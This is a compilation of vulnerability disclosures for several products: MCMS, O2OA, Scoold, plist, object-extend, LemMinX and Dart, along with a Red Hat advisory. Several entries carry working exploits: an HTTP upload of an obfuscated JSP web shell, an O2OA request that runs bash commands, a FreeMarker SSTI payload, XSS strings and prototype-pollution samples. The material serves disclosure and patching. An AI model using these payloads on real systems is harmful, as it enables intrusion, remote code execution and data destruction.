The package object-extend from 0.0.0 are vulnerable to Prototype Pollution via object-extend.

Prototype Pollution is a vulnerability affecting JavaScript. Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. JavaScript allows all Object attributes to be altered, including their magical attributes such as `_proto_`, `constructor` and `prototype`. An attacker manipulates these attributes to overwrite, or pollute, a JavaScript application object prototype of the base object by injecting other values. Properties on the `Object.prototype` are then inherited by all the JavaScript objects through the prototype chain. When that happens, this leads to either denial of service by triggering JavaScript exceptions, or it tampers with the application source code to force the code path that the attacker injects, thereby leading to remote code execution.

There are two main ways in which the pollution of prototypes occurs:

*   Unsafe `Object` recursive merge
    
*   Property definition by path
    

**Unsafe Object recursive merge**

The logic of a vulnerable recursive merge function follows the following high-level model:

    merge (target, source)
    
      foreach property of source
    if property exists and is an object on both the target and the source
    
      merge(target[property], source[property])
    
    else
    
      target[property] = source[property]
    
    

When the source object contains a property named `_proto_` defined with `Object.defineProperty()` , the condition that checks if the property exists and is an object on both the target and the source passes and the merge recurses with the target, being the prototype of `Object` and the source of `Object` as defined by the attacker. Properties are then copied on the `Object` prototype.

Clone operations are a special sub-class of unsafe recursive merges, which occur when a recursive merge is conducted on an empty object: `merge({},source)`.

`lodash` and `Hoek` are examples of libraries susceptible to recursive merge attacks.

**Property definition by path**

There are a few JavaScript libraries that use an API to define property values on an object based on a given path. The function that is generally affected contains this signature: `theFunction(object, path, value)`

If the attacker can control the value of “path”, they can set this value to `_proto_.myValue`. `myValue` is then assigned to the prototype of the class of the object.

CVE-2021-23702: Prototype Pollution in object-extend | CVE-2021-23702 | Snyk

MCMS v5.2.5 was discovered to contain an arbitrary file deletion vulnerability via the component oldFileName.

**SSTI**  
FreeMarker template is used in the project，and there is no secure configuration  
Insert the payload in the background - > system settings - > template management  
<#assign value="freemarker.template.utility.Execute"?new()>${value("whoami")}  
![image](https://user-images.githubusercontent.com/96775289/147651642-f3b51edc-0278-4c75-aec0-79d835c8e335.png)

![image](https://user-images.githubusercontent.com/96775289/147569534-03ac936e-b3c6-413e-8edc-a1c7f8fb4679.png)  
net/mingsoft/basic/action/TemplateAction.java There's a suffix check, it's written to the file  
![image](https://user-images.githubusercontent.com/96775289/147571546-666729e2-5ebf-4276-b6c3-1c652f52aee8.png)

net/mingsoft/basic/util/BasicUtil.java GetRealTemplatePath of this class is called  
![image](https://user-images.githubusercontent.com/96775289/147571639-e379e0c0-631b-46cc-9027-c00352201794.png)

coverage /target/classes/WEB-INF/manager/main.ftl ，Refresh the home page  
![image](https://user-images.githubusercontent.com/96775289/147571700-d5500df5-b65e-4cc3-8fbf-619741c31976.png)

**Delete any file**  
If the oldFileName argument exists, the corresponding file is deleted  
![image](https://user-images.githubusercontent.com/96775289/147571865-882c5e2b-bc07-411d-8cdc-0032b6704663.png)  
Call the FileUtil.class  
![image](https://user-images.githubusercontent.com/96775289/147572105-52e5ff2f-9dda-4063-b567-d091b2be2e55.png)  
poc：  
fileName=x&oldFileName=file destination

CVE-2021-46062: SSTI、Delete any file · Issue #59 · ming-soft/MCMS

MCMS v5.2.4 was discovered to contain an arbitrary file deletion vulnerability via the component /template/unzip.do.

An open source CMS Project,https://github.com/ming-soft/MCMS

the MCMS vulnerabilities include

*   Reflect XSS
*   Unauthorized file upload
*   Authorized file delete

**Reproduce****XSS**

path `/ms/template/unzip.do` exist reflect xss

![](https://gitee.com/tjdx1817054/typora/raw/master/1640674036583-2021-12-2814:47:16.png)

**payload**

1  

/ms/template/unZip.do?fileUrl=%3C/p%3E%3Cimg%20src=x%20onerror=alert(%27hacking%27)%3E  

Authorized file uploads exist

path `/ms/file/uploadTemplate.do`

![](https://gitee.com/tjdx1817054/typora/raw/master/1640674695100-2021-12-2814:58:15.png)

![](https://gitee.com/tjdx1817054/typora/raw/master/1640674447313-2021-12-2814:54:07.png)

need login get Cookie and upload file

**Unauthorized file upload to RCE**

path `/file/upload`

![](https://gitee.com/tjdx1817054/typora/raw/master/1640674792504-2021-12-2814:59:52.png)

![](https://gitee.com/tjdx1817054/typora/raw/master/1640674556372-2021-12-2814:55:56.png)

as above picture ,hacker can upload `.jspx` file to server without any identity verification , **and even when project packaged war deploy in tomcat can get web shell from server.**

> the system filter suffix `.jsp` but still can use `.jspx` to bypass

**payload**

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  
11  
12  
13  
14  
15  
16  
17  
18  
19  
20  
21  
22  
23  
24  
25  
26  
27  
28  
29  
30  
31  
32  
33  
34  
35  
36  
37  
38  
39  
40  
41  
42  
43  
44  
45  
46  
47  
48  
49  

POST /file/upload.do HTTP/1.1  
Host: 192.168.100.103:8080  
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:95.0) Gecko/20100101 Firefox/95.0  
Accept: \*/\*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: multipart/form-data; boundary=---------------------------124088951720288539841514905041  
Content-Length: 1393  
Origin: http://192.168.100.103:8080  
Connection: keep-alive  
  
\-----------------------------124088951720288539841514905041  
Content-Disposition: form-data; name="uploadPath"  
  
/  
\-----------------------------124088951720288539841514905041  
Content-Disposition: form-data; name="isRename"  
  
false  
\-----------------------------124088951720288539841514905041  
Content-Disposition: form-data; name="appId"  
  
false  
\-----------------------------124088951720288539841514905041  
Content-Disposition: form-data; name="file"; filename="shell.jspx"  
Content-Type: image/png  
  
<%@ page contentType="text/html;charset=UTF-8" language="java" %>  
<%@ page import="sun.misc.BASE64Decoder" %>  
<%  
if(request.getParameter("cmd")!=null){  
    BASE64Decoder decoder = new BASE64Decoder();  
    Class rt = Class.forName(new String(decoder.decodeBuffer("amF2YS5sYW5nLlJ1bnRpbWU=")));  
    Process e = (Process)  
            rt.getMethod(new String(decoder.decodeBuffer("ZXhlYw==")), String.class).invoke(rt.getMethod(new  
                    String(decoder.decodeBuffer("Z2V0UnVudGltZQ=="))).invoke(null, new  
                    Object\[\]{}), request.getParameter("cmd") );  
    java.io.InputStream in = e.getInputStream();  
    int a = -1;  
    byte\[\] b = new byte\[2048\];  
    out.print("<pre>");  
    while((a=in.read(b))!=-1){  
        out.println(new String(b));  
    }  
    out.print("</pre>");  
}  
%>  
\-----------------------------124088951720288539841514905041--  
  

**source**

`net/mingsoft/basic/action/ManageFileAction.java`

![](https://gitee.com/tjdx1817054/typora/raw/master/1640675058416-2021-12-2815:04:18.png)

**Authorized file delete**

![](https://gitee.com/tjdx1817054/typora/raw/master/1640675200781-2021-12-2815:06:40.png)

`net/mingsoft/basic/action/TemplateAction.java`

![](https://gitee.com/tjdx1817054/typora/raw/master/1640668607171-2021-12-2813:16:47.png)

**payload**

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  
11  
12  

GET /ms/template/unZip.do?fileUrl=HACKED HTTP/1.1  
Host: 192.168.100.103:8080  
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:95.0) Gecko/20100101 Firefox/95.0  
Accept: \*/\*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Cache-Control: no-cache  
Pragma: no-cache  
X-Requested-With: XMLHttpRequest  
Connection: keep-alive  
Referer: http://192.168.100.103:8080/ms/template/index.do?  
Cookie: JSESSIONID=56EC9CCC14E1E8DEE4AACCF732EA7FC7; pageno\_cookie=1  

****

CVE-2021-46037: MCMS vulnerabilities

A flaw was found in LemMinX in versions prior to 0.19.0. Cache poisoning of external schema files due to directory traversal.

CVE-2022-0673: lemminx/CHANGELOG.md at master · eclipse/lemminx

A flaw was found in vscode-xml in versions prior to 0.19.0. Schema download could lead to blind SSRF or DoS via a large file.

CVE-2022-0671: vscode-xml/CHANGELOG.md at master · redhat-developer/vscode-xml

Dart SDK contains the HTTPClient in dart:io library whcih includes authorization headers when handling cross origin redirects. These headers may be explicitly set and contain sensitive information. By default, HttpClient handles redirection logic. If a request is sent to example.com with authorization header and it redirects to an attackers site, they might not expect attacker site to receive authorization header. We recommend updating the Dart SDK to version 2.16.0 or beyond.

To use PolyGerrit, please enable JavaScript in your browser settings, and then refresh this page.

CVE-2022-0451

Scoold 1.47.2 is a Q&A/knowledge base platform written in Java. When writing a Q&A, the markdown editor is vulnerable to a XSS attack when using uppercase letters.

**Description**

The Schold is a Q&A/knowledge base platform written in Java. When writing a Q&A, you can use the markdown editor. So I tried to exploit the `[]()` syntax to try an XSS attack. It seemed to validate `javascript:*` on the backend. So I couldn't use it. However, according to `RFC3986`, the scheme can use uppercase letters! So I was able to bypass it using this.

**Proof of Concept**

    1. Open the https://pro.scoold.com/questions/ask
    2. Enter [XSS](Javascript:alert(document.domain)) as the value for Content, and save it.
    3. Click the XSS text in the Q&A post.
    
    Video : https://www.youtube.com/watch?v=z1Jep-4St48
    

**Impact**

Through this vulnerability, an attacker is capable to execute malicious scripts.

CVE-2021-46372: Cross-site Scripting (XSS) - Stored in scoold

O2OA v6.4.7 was discovered to contain a remote code execution (RCE) vulnerability via /x_program_center/jaxrs/invoke.

    POST /x_program_center/jaxrs/invoke?v=6.3 HTTP/1.1
    Host: [your target host]
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Authorization: [your authorization]
    Connection: close
    Content-Type: application/json; charset=UTF-8
    Content-Length: 475
    
    {"name":"abc","id":"abc","alias":"","description":"","isNewInvoke":true,"text":"/\n\nvar s = [3];\ns[0] = \"/bin/bash\";\ns[1] = \"-c\";\ns[2] = \"[command]\";\nvar p = java.lang.Runtime.getRuntime().exec(s);\nvar sc = new java.util.Scanner(p.getInputStream(),\"GBK\").useDelimiter(\"\\\\A\");\nvar result = sc.hasNext() ? sc.next() : \"\";\nsc.close();","enableToken":false,"enable":true,"remoteAddrRegex":"","lastStartTime":"","lastEndTime":"","validated":true}
    

    POST /x_program_center/jaxrs/invoke/abc/execute?v=6.3 HTTP/1.1
    Host: [your target host]
    Content-Length: 0
    Accept: text/html,application/json,*/*
    X-Requested-With: XMLHttpRequest
    Accept-Language: zh-CN
    Authorization: [your authorization]
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
    Content-Type: application/json; charset=UTF-8
    Origin: http://[your target host]
    Referer: http://[your target host]/x_desktop/index.html
    Accept-Encoding: gzip, deflate
    Cookie: 
    Connection: close

CVE-2022-22916: O2OA-POC/POC.md at main · wendell1224/O2OA-POC

An update for openshift-gitops-applicationset-container, openshift-gitops-container, openshift-gitops-kam-delivery-container, and openshift-gitops-operator-container is now available for Red Hat OpenShift GitOps 1.2. (GitOps v1.2.2)
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.

Related CVEs:
* CVE-2022-24348: gitops: Path traversal and dereference of symlinks when passing Helm value files


Skip to navigation Skip to main content

**Utilities**

*   Subscriptions
*   Downloads
*   Containers
*   Support Cases

![Red Hat Customer Portal](https://access.redhat.com/chrome_themes/nimbus/img/red-hat-customer-portal.svg)

**Infrastructure and Management**

*   Red Hat Enterprise Linux
*   Red Hat Virtualization
*   Red Hat Identity Management
*   Red Hat Directory Server
*   Red Hat Certificate System
*   Red Hat Satellite
*   Red Hat Subscription Management
*   Red Hat Update Infrastructure
*   Red Hat Insights
*   Red Hat Ansible Automation Platform

**Cloud Computing**

*   Red Hat OpenShift
*   Red Hat CloudForms
*   Red Hat OpenStack Platform
*   Red Hat OpenShift Container Platform
*   Red Hat OpenShift Data Science
*   Red Hat OpenShift Online
*   Red Hat OpenShift Dedicated
*   Red Hat Advanced Cluster Security for Kubernetes
*   Red Hat Advanced Cluster Management for Kubernetes
*   Red Hat Quay
*   Red Hat CodeReady Workspaces
*   Red Hat OpenShift Service on AWS

**Storage**

*   Red Hat Gluster Storage
*   Red Hat Hyperconverged Infrastructure
*   Red Hat Ceph Storage
*   Red Hat OpenShift Data Foundation

**Runtimes**

*   Red Hat Runtimes
*   Red Hat JBoss Enterprise Application Platform
*   Red Hat Data Grid
*   Red Hat JBoss Web Server
*   Red Hat Single Sign On
*   Red Hat support for Spring Boot
*   Red Hat build of Node.js
*   Red Hat build of Thorntail
*   Red Hat build of Eclipse Vert.x
*   Red Hat build of OpenJDK
*   Red Hat build of Quarkus
*   Red Hat CodeReady Studio

**Integration and Automation**

*   Red Hat Process Automation
*   Red Hat Process Automation Manager
*   Red Hat Decision Manager

All Products

Issued:

2022-02-17

Updated:

2022-02-17

**RHSA-2022:0580 - Security Advisory**

*   Overview
*   Updated Packages

**Synopsis**

Important: Red Hat OpenShift GitOps security update

**Type/Severity**

Security Advisory: Important

**Topic**

An update for openshift-gitops-applicationset-container, openshift-gitops-container, openshift-gitops-kam-delivery-container, and openshift-gitops-operator-container is now available for Red Hat OpenShift GitOps 1.2. (GitOps v1.2.2)  

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

**Description**

Red Hat Openshift GitOps is a declarative way to implement continuous deployment for cloud native applications.  

Security Fix(es):  

*   gitops: Path traversal and dereference of symlinks when passing Helm value files (CVE-2022-24348)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

**Affected Products**

*   Red Hat OpenShift GitOps 1.2 x86\_64

**Fixes**

*   BZ - 2050826 - CVE-2022-24348 gitops: Path traversal and dereference of symlinks when passing Helm value files

**CVEs**

*   CVE-2016-4658
*   CVE-2019-5827
*   CVE-2019-13750
*   CVE-2019-13751
*   CVE-2019-17594
*   CVE-2019-17595
*   CVE-2019-18218
*   CVE-2019-19603
*   CVE-2019-20838
*   CVE-2020-12762
*   CVE-2020-13435
*   CVE-2020-14145
*   CVE-2020-14155
*   CVE-2020-16135
*   CVE-2020-24370
*   CVE-2021-3200
*   CVE-2021-3426
*   CVE-2021-3445
*   CVE-2021-3521
*   CVE-2021-3572
*   CVE-2021-3580
*   CVE-2021-3712
*   CVE-2021-3800
*   CVE-2021-20231
*   CVE-2021-20232
*   CVE-2021-20271
*   CVE-2021-22876
*   CVE-2021-22898
*   CVE-2021-22925
*   CVE-2021-27645
*   CVE-2021-28153
*   CVE-2021-33560
*   CVE-2021-33574
*   CVE-2021-35942
*   CVE-2021-36084
*   CVE-2021-36085
*   CVE-2021-36086
*   CVE-2021-36087
*   CVE-2021-37750
*   CVE-2021-39241
*   CVE-2021-40346
*   CVE-2021-42574
*   CVE-2021-43527
*   CVE-2021-44790
*   CVE-2022-24348

**Red Hat OpenShift GitOps 1.2**

SRPM

x86\_64

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/.

RHSA-2022:0580: Red Hat Security Advisory: Red Hat OpenShift GitOps security update

Prototype pollution vulnerability via .parse() in Plist before v3.0.4 allows attackers to cause a Denial of Service (DoS) and may lead to remote code execution.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Closed

keerok opened this issue

Jan 6, 2022

· 6 comments

**Comments**

Hi, There's a prototype pollution in .parse() related to the xml that are being parsed in it. In the following example the prototype pollution will affect the length parameter.

var plist \= require('plist');

var xml \= \`
<plist version="1.0">
    <key>metadata</key>
    <dict>
      <key>bundle-identifier</key>
      <string>com.company.app</string>
    </dict>
  </plist>\`;

console.log(plist.parse(xml));
/\*\*
 \* \* \* \* \* \* \* \* \* \* \* \* \* \* \* \* \* \* \* \* \* \* \* \* \* \*
 \* \* \* \* END OF THE NORMAL CODE EXAMPLE! \* \* \* \* \* \* 
 \* \* \* \* \* \* \* \* \* \* \* \* \* \* \* \* \* \* \* \* \* \* \* \* \* \* 
 \*\*/

/\*\*
 \* \* \* \* \* \* \* \* \* \* \* \*
 \* PROTOTYPE POLLUTION \*
 \* \* \* \* \* \* \* \* \* \* \* \*
 \*\*/
var xmlPollution \= \`
<plist version="1.0">
  <dict>
    <key>\_\_proto\_\_</key>
    <dict>
      <key>length</key>
      <string>polluted</string>
    </dict>
  </dict>
</plist>\`;
console.log(plist.parse(xmlPollution).length); // polluted

*   More information about the vulnerability: https://github.com/HoLyVieR/prototype-pollution-nsec18/blob/master/paper/JavaScript\_prototype\_pollution\_attack\_in\_NodeJS.pdf

 **ghost** mentioned this issue

Mar 2, 2022

 **ghost** mentioned this issue

Mar 2, 2022

The Github advisory states this vulnerability has been fixed on 3.0.4 but I can still reproduce in 3.0.4 as well.

The version 3.0.4 has been released back in August 2021 and the vulnerability was reported on January 2022. The 3.0.4 version only inlines an external dependency so does little in terms of security.

The vulnerable code seems to be on the parsePlistXml function

new\_obj\[key\] \= parsePlistXML(node.childNodes\[i\]);

@TooTallNate will try to submit a PR to fix this vulnerability in the next few days, unless you want to fix yourself.

mreinstein added a commit that referenced this issue

Mar 21, 2022

Fix prototype pollution #114

Thanks for merging my PR @mreinstein . Would you please release a new version of plist with this fix? So people can patch against this prototype pollution vulnerability.

published as 3.0.5 on npm. Thanks for the PR!

this issue still happen on version 3.0.5 with nexus scan.

@Donhv the problem appears to be that NIST has the vulnerability listed as addressed in 3.0.4:  
https://nvd.nist.gov/vuln/detail/CVE-2022-22912

...but it was actually addressed in 3.0.5. Nexus has listed an "advisory deviation notice" because they tested 3.0.4 and found the vulnerability still extant. I've informed Nexus and hopefully they will update the status of 3.0.5. (Kudos that they go through the effort of verifying!)

Updated info. Looks like dist directory is missing the patch:  
#128

Tag

#java